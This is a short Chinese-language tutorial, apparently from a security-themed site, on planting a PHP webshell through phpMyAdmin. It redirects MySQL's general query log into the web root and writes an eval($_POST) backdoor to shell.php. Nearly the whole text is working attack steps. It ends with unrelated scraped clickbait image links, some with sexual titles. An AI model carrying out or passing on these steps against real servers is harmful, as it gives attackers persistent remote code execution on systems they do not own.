1、登录phpmyadmin
2、查看数据路径,作为猜web路径辅助
select @@datadir;
3、查看日志功能是否开启:
(一般这个日志记录是默认关闭的,需要我们手动开启)
show variables like '%general%';
4、开启日志功能:
SET GLOBAL general_log='on';
5、修改日志路径:
set global general_log_file='D:\\phpStudy\\WWW\\shell.php';
6、执行包含shell的语句即可:
select "<?php eval($_POST['gg']);?>";
7、查看结果:
8、ps:发布文章火绒提示webshell….
![[下载] 清华大学计算机网络课程(11G)-微慑信息网-VulSee.com](http://bbs.crsky.com/1236983883/thumb/Mon_0908/123_166760_268f798025a83f8.jpg)
![[美图] 最美自拍女教师裸照惊现[真实7P]-微慑信息网-VulSee.com](http://www.enoya.com/1139444703/Day_081114/24_169364_02599784e687a7d.jpg)
![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)
青云网
